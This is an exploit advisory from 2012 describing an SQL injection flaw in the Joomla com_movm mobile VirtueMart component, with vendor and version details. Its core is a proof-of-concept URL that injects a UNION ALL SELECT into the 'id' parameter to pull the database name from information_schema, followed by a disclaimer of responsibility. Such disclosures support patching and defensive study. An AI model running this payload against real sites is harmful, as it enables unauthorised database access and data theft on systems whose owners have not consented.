38 lines
No EOL
1.2 KiB
Text
38 lines
No EOL
1.2 KiB
Text
_______________________________________________________________________________________
|
|
|
|
Exploit Title: Joomla com_movm SQL Injection
|
|
|
|
Date: [31-07-2012]
|
|
|
|
Author: Daniel Barragan "D4NB4R"
|
|
|
|
Twitter: @D4NB4R
|
|
|
|
site: http://poisonsecurity.wordpress.com/
|
|
|
|
Vendor: http://www.movm.net/
|
|
|
|
Version: 1.0 (Date Added 28 July 2012)
|
|
|
|
License: Commercial $ 49.99 us
|
|
|
|
Demo: http://www.movm.net/movm-mobile-virtuemart-site-demo/
|
|
|
|
Tested on: [Linux(bt5)-Windows(7ultimate)]
|
|
|
|
|
|
This component was released 3 days ago.be careful when using this component
|
|
Movm is a joomla extension for mobiles which optimize VirtueMart sites for iphone, android and blackberry.
|
|
It is compatible with Joomla2.5 and VirtueMart 2.0.Have used Jquery mobile, so it gives native effect to Web App.
|
|
This component can be Attacked from a mobile, put the following string in the url field.
|
|
|
|
p0C
|
|
|
|
http://server/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20
|
|
|
|
|
|
|
|
Im not responsible for which is given
|
|
No me hago responsable del uso que se le de
|
|
_______________________________________________________________________________________
|
|
Daniel Barragan "D4NB4R" 2012 |